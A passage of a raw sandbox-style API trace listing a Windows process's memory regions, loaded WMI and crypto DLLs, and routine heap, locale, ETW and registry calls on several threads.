filename = "" Region: id = 1083 start_va = 0xe50000 end_va = 0xf4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1084 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1085 start_va = 0x759b0000 end_va = 0x75a32fff monitored = 0 entry_point = 0x759b23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1086 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1087 start_va = 0x74e90000 end_va = 0x74e9afff monitored = 0 entry_point = 0x74e952a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1088 start_va = 0x1e0000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1089 start_va = 0x8d0000 end_va = 0x90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 1090 start_va = 0x930000 end_va = 0x96ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 1091 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 1092 start_va = 0x73e00000 end_va = 0x73e16fff monitored = 0 entry_point = 0x73e03573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1093 start_va = 0x1a0000 end_va = 0x1dbfff monitored = 0 entry_point = 0x1a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1094 start_va = 0x1a0000 end_va = 0x1dbfff monitored = 0 entry_point = 0x1a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1095 start_va = 0x1a0000 end_va = 0x1dbfff monitored = 0 entry_point = 0x1a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1096 start_va = 0x1a0000 end_va = 0x1dbfff monitored = 0 entry_point = 0x1a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1097 start_va = 0x1a0000 end_va = 0x1dbfff monitored = 0 entry_point = 0x1a128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1098 start_va = 0x73dc0000 end_va = 0x73dfafff monitored = 0 entry_point = 0x73dc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1099 start_va = 0x73f80000 end_va = 0x73f8dfff monitored = 0 entry_point = 0x73f81235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\SysWOW64\\RpcRtRemote.dll" (normalized: "c:\\windows\\syswow64\\rpcrtremote.dll") Region: id = 1100 start_va = 0xca0000 end_va = 0xcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 1101 start_va = 0xf50000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1102 start_va = 0xf90000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1103 start_va = 0x1030000 end_va = 0x106ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 1104 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1105 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1106 start_va = 0x74df0000 end_va = 0x74dfefff monitored = 0 entry_point = 0x74df93d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1107 start_va = 0x420000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1108 start_va = 0x10e0000 end_va = 0x111ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010e0000" filename = "" Region: id = 1109 start_va = 0x74da0000 end_va = 0x74db9fff monitored = 0 entry_point = 0x74db03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\SysWOW64\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wmiutils.dll") Region: id = 1110 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1111 start_va = 0x72380000 end_va = 0x7239cfff monitored = 0 entry_point = 0x72392eb0 region_type = mapped_file name = "stdprov.dll" filename = "\\Windows\\SysWOW64\\wbem\\stdprov.dll" (normalized: "c:\\windows\\syswow64\\wbem\\stdprov.dll") Region: id = 1112 start_va = 0x72360000 end_va = 0x72376fff monitored = 0 entry_point = 0x72361c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 1113 start_va = 0x74120000 end_va = 0x7412afff monitored = 0 entry_point = 0x74121992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1114 start_va = 0x72310000 end_va = 0x72359fff monitored = 0 entry_point = 0x72343960 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\SysWOW64\\wbem\\esscli.dll" (normalized: "c:\\windows\\syswow64\\wbem\\esscli.dll") Region: id = 1115 start_va = 0x1a0000 end_va = 0x1a8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1116 start_va = 0x1a0000 end_va = 0x1a8fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1399 start_va = 0x1130000 end_va = 0x116ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1400 start_va = 0x11d0000 end_va = 0x120ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1401 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Thread: id = 82 os_tid = 0xf10 [0048.119] malloc (_Size=0x80) returned 0x221228 [0048.120] GetProcessHeap () returned 0x490000 [0048.120] __dllonexit () returned 0x74e5fbb0 [0048.120] GetProcessHeap () returned 0x490000 [0048.120] __dllonexit () returned 0x74e5fbc0 [0048.120] __dllonexit () returned 0x74e5fbe0 [0048.120] GetTickCount () returned 0x19f550a [0048.120] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0x8c [0048.120] LoadLibraryExW (lpLibFileName="API-MS-Win-Core-LocalRegistry-L1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x75130000 [0048.121] GetProcAddress (hModule=0x75130000, lpProcName="RegCreateKeyExW") returned 0x75148613 [0048.121] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x3, lpSecurityAttributes=0x0, phkResult=0x16f1e0, lpdwDisposition=0x16f1a0 | out: phkResult=0x16f1e0*=0x0, lpdwDisposition=0x16f1a0*=0x2) returned 0x5 [0048.121] GetSystemDirectoryW (in: lpBuffer=0x74e738b4, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0048.122] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WBEM\\Logs\\" (normalized: "c:\\windows\\syswow64\\wbem\\logs")) returned 0x10 [0048.122] GetLastError () returned 0x0 [0048.122] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x16f1e8, lpdwDisposition=0x16f1a8 | out: phkResult=0x16f1e8*=0x0, lpdwDisposition=0x16f1a8*=0x2) returned 0x5 [0048.122] _vsnwprintf (in: _Buffer=0x16f188, _BufferCount=0x1d, _Format="%d", _ArgList=0x16f174 | out: _Buffer="1") returned 1 [0048.122] _vsnwprintf (in: _Buffer=0x16f188, _BufferCount=0x1d, _Format="%d", _ArgList=0x16f174 | out: _Buffer="65536") returned 5 [0048.123] __dllonexit () returned 0x74e5fc00 [0048.123] __dllonexit () returned 0x74e5fc20 [0048.123] __dllonexit () returned 0x74e5fc40 [0048.123] __dllonexit () returned 0x74e5fc50 [0048.123] __dllonexit () returned 0x74e5fc70 [0048.123] DisableThreadLibraryCalls (hLibModule=0x74e20000) returned 1 [0048.123] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4bd028 [0048.124] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4bd048 [0048.124] GetVersion () returned 0x1db10106 [0048.124] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77460000 [0048.124] GetProcAddress (hModule=0x77460000, lpProcName="EtwRegisterTraceGuidsW") returned 0x7749f843 [0048.124] EtwRegisterTraceGuidsW () returned 0x0 [0048.124] EtwRegisterTraceGuidsW () returned 0x0 [0048.202] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4cf2c8 [0048.202] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c96f8 [0048.202] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cf2c8 | out: hHeap=0x490000) returned 1 [0048.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4cf2f8 [0048.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9708 [0048.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1a) returned 0x4cba08 [0048.203] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x22) returned 0x4cc7d0 [0048.203] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cba08 | out: hHeap=0x490000) returned 1 [0048.243] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfdc8 [0048.243] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4cc920 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x44) returned 0x4c8928 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfda8 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4cc950 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1a) returned 0x4d54d8 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfde8 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4cc980 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x28) returned 0x4cc9b0 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfe08 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4cc9e0 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4cca10 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfe28 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4cca40 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x26) returned 0x4cca70 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfe48 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4ccaa0 [0048.244] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x26) returned 0x4dd778 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4d5500 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd7a8 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x5a) returned 0x4e1f58 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd7d8 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x5e) returned 0x4de040 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4cfe68 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd808 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x64) returned 0x4e1fc0 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4d5488 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd838 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x68) returned 0x4e2030 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4cfe88 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd868 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x5c) returned 0x4e20a0 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4d53e8 [0048.245] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd898 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x56) returned 0x4dfb10 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfea8 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd8c8 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x46) returned 0x4c8978 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfec8 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd8f8 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x86) returned 0x4e2108 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cfee8 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd928 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x56) returned 0x4dfb70 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cff08 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd958 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4e) returned 0x4dec60 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4cff28 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x24) returned 0x4dd988 [0048.246] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x48) returned 0x4c89c8 [0048.247] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.247] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8898 [0048.247] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4cff48 [0048.248] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4cff68 [0048.249] GetModuleHandleW (lpModuleName="Kernel32") returned 0x75130000 [0048.250] GetProcAddress (hModule=0x75130000, lpProcName="GetThreadPreferredUILanguages") returned 0x751c4d41 [0048.250] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadPreferredUILanguages") returned 0x751d7f95 [0048.250] GetProcAddress (hModule=0x75130000, lpProcName="LocaleNameToLCID") returned 0x751c4da1 [0048.250] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoEx") returned 0x751c4cf1 [0048.250] GetProcAddress (hModule=0x75130000, lpProcName="LCIDToLocaleName") returned 0x7516cec4 [0048.250] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDefaultLocaleName") returned 0x751c4d21 [0048.250] SetLastError (dwErrCode=0x0) [0048.250] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0x16f5ac, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16f50c | out: pulNumLanguages=0x16f5ac, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16f50c) returned 1 [0048.250] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4cff88 [0048.250] SetLastError (dwErrCode=0x0) [0048.250] GetThreadPreferredUILanguages (in: dwFlags=0x30, pulNumLanguages=0x16f5ac, pwszLanguagesBuffer=0x4cff88, pcchLanguagesBuffer=0x16f50c | out: pulNumLanguages=0x16f5ac, pwszLanguagesBuffer=0x4cff88, pcchLanguagesBuffer=0x16f50c) returned 1 [0048.250] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4cffa8 [0048.251] LocaleNameToLCID (lpName="en-US", dwFlags=0x0) returned 0x409 [0048.251] LocaleNameToLCID (lpName="en", dwFlags=0x0) returned 0x409 [0048.251] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cff88 | out: hHeap=0x490000) returned 1 [0048.251] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x12) returned 0x4cff88 [0048.256] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x28) returned 0x4dd9e8 [0048.256] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x48) returned 0x4c8a18 [0048.256] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2 [0048.258] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cff88 | out: hHeap=0x490000) returned 1 [0048.258] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cffa8 | out: hHeap=0x490000) returned 1 [0048.258] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8898 | out: hHeap=0x490000) returned 1 [0048.258] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cff48 | out: hHeap=0x490000) returned 1 [0048.258] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cff68 | out: hHeap=0x490000) returned 1 [0048.259] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4b7cc0 | out: hHeap=0x490000) returned 1 [0048.260] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cc7d0 | out: hHeap=0x490000) returned 1 [0048.260] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9708 | out: hHeap=0x490000) returned 1 [0048.260] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cf2f8 | out: hHeap=0x490000) returned 1 [0048.263] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4cf2f8 [0048.263] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4e2ee8 [0048.264] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8898 [0048.264] GetProcAddress (hModule=0x75130000, lpProcName="RegOpenKeyExW") returned 0x751422c1 [0048.265] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\WBEM\\CIMOM", ulOptions=0x0, samDesired=0x20019, phkResult=0x16eef4 | out: phkResult=0x16eef4*=0x1a0) returned 0x0 [0048.265] GetProcAddress (hModule=0x75130000, lpProcName="RegQueryValueExW") returned 0x75141efe [0048.265] RegQueryValueExW (in: hKey=0x1a0, lpValueName="EnableObjectValidation", lpReserved=0x0, lpType=0x16ee94, lpData=0x16ee9c, lpcbData=0x16ee90*=0x19 | out: lpType=0x16ee94*=0x0, lpData=0x16ee9c*=0x19, lpcbData=0x16ee90*=0x19) returned 0x2 [0048.265] GetProcAddress (hModule=0x75130000, lpProcName="RegCloseKey") returned 0x7514204f [0048.265] RegCloseKey (hKey=0x1a0) returned 0x0 [0048.265] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8898 | out: hHeap=0x490000) returned 1 [0048.265] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cf2f8 | out: hHeap=0x490000) returned 1 [0048.266] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2ee8 | out: hHeap=0x490000) returned 1 [0048.267] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4cf2f8 [0048.268] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4e2ee8 [0048.268] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8898 [0048.268] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8898 | out: hHeap=0x490000) returned 1 [0048.268] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cf2f8 | out: hHeap=0x490000) returned 1 [0048.269] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2ee8 | out: hHeap=0x490000) returned 1 [0048.270] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4cf2f8 [0048.270] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4e2fb8 [0048.270] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8898 [0048.270] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8898 | out: hHeap=0x490000) returned 1 [0048.270] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4cf2f8 | out: hHeap=0x490000) returned 1 [0048.271] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4e2fb8 | out: hHeap=0x490000) returned 1 [0048.272] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c8a18 | out: hHeap=0x490000) returned 1 [0048.273] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4dd9e8 | out: hHeap=0x490000) returned 1 [0048.273] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c96f8 | out: hHeap=0x490000) returned 1 [0127.016] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bd048 | out: hHeap=0x490000) returned 1 [0127.016] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4bd028 | out: hHeap=0x490000) returned 1 [0127.016] GetProcAddress (hModule=0x77460000, lpProcName="EtwUnregisterTraceGuids") returned 0x774b9286 [0127.016] EtwUnregisterTraceGuids () returned 0x0 [0127.016] EtwUnregisterTraceGuids () returned 0x0 [0127.017] CloseHandle (hObject=0x8c) returned 1 [0127.017] GetProcessHeap () returned 0x490000 [0127.018] free (_Block=0x221228) Thread: id = 83 os_tid = 0xf14 Thread: id = 84 os_tid = 0xf18 Thread: id = 85 os_tid = 0xf1c Thread: id = 86 os_tid = 0xf20 [0048.290] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7cc0 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8898 [0048.291] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8898 | out: hHeap=0x490000) returned 1 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e6568 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0088 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00a8 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00c8 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d00e8 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0108 [0048.291] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x28) returned 0x4ddb68 [0048.292] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x48) returned 0x4c8c98 [0048.292] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2 [0048.292] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x28) returned 0x4ddb38 [0048.292] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x48) returned 0x4c8ce8 [0048.292] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x2 [0048.313] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x8) returned 0x4c9758 [0048.313] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x64) returned 0x4e70e8 [0048.313] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e66d0 [0048.315] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4c9758 | out: hHeap=0x490000) returned 1 [0048.315] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x1a) returned 0x4e6720 [0048.315] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x14) returned 0x4d0068 [0048.315] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xa) returned 0x4d8928 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x48) returned 0x4c8d38 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8958 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xa) returned 0x4d8970 [0048.316] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d8928 | out: hHeap=0x490000) returned 1 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x48) returned 0x4c8d88 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d8988 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d89a0 [0048.316] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x4) returned 0x4c9848 [0048.316] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d0068 | out: hHeap=0x490000) returned 1 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x78) returned 0x4b7ec0 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d89b8 [0048.319] HeapFree (in: hHeap=0x490000, dwFlags=0x0, lpMem=0x4d89b8 | out: hHeap=0x490000) returned 1 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x20) returned 0x4e6770 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0148 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0168 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d0188 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01a8 [0048.319] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x18) returned 0x4d01c8 [0048.321] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0xc) returned 0x4d89b8 [0048.321] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x190) returned 0x4e9bf0 [0048.322] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x0, Size=0x10) returned 0x4d89d0 